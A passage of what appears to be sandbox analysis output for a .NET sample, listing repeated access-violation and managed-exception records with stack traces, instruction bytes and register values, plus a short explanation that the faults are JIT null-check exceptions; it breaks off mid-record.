CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0x6a0234
0x6a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 39 09 e8 32 2f 7b 6e c7 45 e8 00 00 00 00 c7 45
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6a81ab
registers.esp: 3989156
registers.edi: 3989176
registers.eax: 0
registers.ebp: 3989188
registers.edx: 37687848
registers.ebx: 3989488
registers.esi: 37687848
registers.ecx: 0
1 0 0

The faulting instruction cmp dword ptr [ecx], ecx with ecx = 0 is the explicit null check the CLR x86 JIT emits, so this 0xc0000005 is a managed NullReferenceException raised inside the sample's JIT-compiled code (the unsymbolised frames at the top of the trace), not a crash in the runtime; the sample keeps running after it. The 0xe0434f4e entry further down is the CLR's generic managed-exception code surfacing through KERNELBASE!RaiseException.

__exception__

stacktrace:
0x6a8150
0x6a7639
0x6a71c9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998
CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0x6a0234
0x6a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 39 09 e8 32 2f 7b 6e c7 45 e8 00 00 00 00 c7 45
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6a81ab
registers.esp: 3989156
registers.edi: 3989176
registers.eax: 0
registers.ebp: 3989188
registers.edx: 52825440
registers.ebx: 3989488
registers.esi: 52825440
registers.ecx: 0
1 0 0

__exception__

stacktrace:
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1
mscorlib+0x2f45b0 @ 0x6eed45b0
mscorlib+0x2f73b5 @ 0x6eed73b5
mscorlib+0x2eeaf8 @ 0x6eeceaf8
mscorlib+0x2eea8f @ 0x6eecea8f
0xa004a6
0xa000f4
0xa000b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 3599236
registers.edi: 0
registers.eax: 3599236
registers.ebp: 3599316
registers.edx: 0
registers.ebx: 8441088
registers.esi: 7743184
registers.ecx: 749819278
1 0 0

__exception__

stacktrace:
0xa0813e
0xa07639
0xa071c9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998
CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0xa00234
0xa000b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 39 09 e8 32 2f 45 6e c7 45 e8 00 00 00 00 c7 45
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa081ab
registers.esp: 3594708
registers.edi: 3594728
registers.eax: 0
registers.ebp: 3594740
registers.edx: 38146600
registers.ebx: 3595040
registers.esi: 38146600
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xa08150
0xa07639
0xa071c9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998
CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0xa00234
0xa000b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 39 09 e8 32 2f 45 6e c7 45 e8 00 00 00 00 c7 45
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa081ab
registers.esp: 3594708
registers.edi: 3594728
registers.eax: 0
registers.ebp: 3594740
registers.edx: 49586860
registers.ebx: 3595040
registers.esi: 49586860
registers.ecx: 0
1 0 0

__exception__

stacktrace:
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1
mscorlib+0x2f45a5 @ 0x6eed45a5
mscorlib+0x2f74d4 @ 0x6eed74d4
mscorlib+0x30c46d @ 0x6eeec46d
system+0xea3b4 @ 0x644ea3b4
system+0xcec2d @ 0x644cec2d
system+0x6f7869 @ 0x658e7869
system+0x6f6e71 @ 0x658e6e71
system+0x6f3892 @ 0x658e3892
system+0x6f3514 @ 0x658e3514
system+0x6f42ec @ 0x658e42ec
0x4a051a
0x4a00f4
0x4a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 4321168
registers.edi: 0
registers.eax: 4321168
registers.ebp: 4321248
registers.edx: 0
registers.ebx: 7836560
registers.esi: 7104304
registers.ecx: 766055242
1 0 0

__exception__

stacktrace:
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1
mscorlib+0x2f45aa @ 0x6eed45aa
mscorlib+0x2f74d4 @ 0x6eed74d4
mscorlib+0x30c46d @ 0x6eeec46d
system+0x9f2d4 @ 0x70baf2d4
system+0xa7fe5 @ 0x70bb7fe5
system+0xab6a2 @ 0x70bbb6a2
system+0xa1e00 @ 0x70bb1e00
system+0x6f4ce3 @ 0x658e4ce3
system+0x6f6fb8 @ 0x658e6fb8
system+0x6f3892 @ 0x658e3892
system+0x6f3514 @ 0x658e3514
system+0x6f42ec @ 0x658e42ec
0x4a051a
0x4a00f4
0x4a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 4320812
registers.edi: 0
registers.eax: 4320812
registers.ebp: 4320892
registers.edx: 0
registers.ebx: 7836560
registers.esi: 7104304
registers.ecx: 766055082
1 0 0

__exception__

stacktrace:
0x4a813e
0x4a7639
0x4a71c9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998
CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9
mscorlib+0x2d3711 @ 0x6eeb3711
mscorlib+0x308f2d @ 0x6eee8f2d
mscorlib+0x2cb060 @ 0x6eeab060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737
mscorlib+0x2d36ad @ 0x6eeb36ad
mscorlib+0x308f2d @ 0x6eee8f2d
microsoft+0x50c17 @ 0x72050c17
microsoft+0x3f33f @ 0x7203f33f
microsoft+0x3edf8 @ 0x7203edf8
microsoft+0x3e3b9 @ 0x7203e3b9
0x4a0234
0x4a00b2
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 39 09 e8 32 2f 9b 6e c7 45 e8 00 00 00 00 c7 45
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4a81ab
registers.esp: 4316916
registers.edi: 4316936
registers.eax: 0
registers.ebp: 4316948
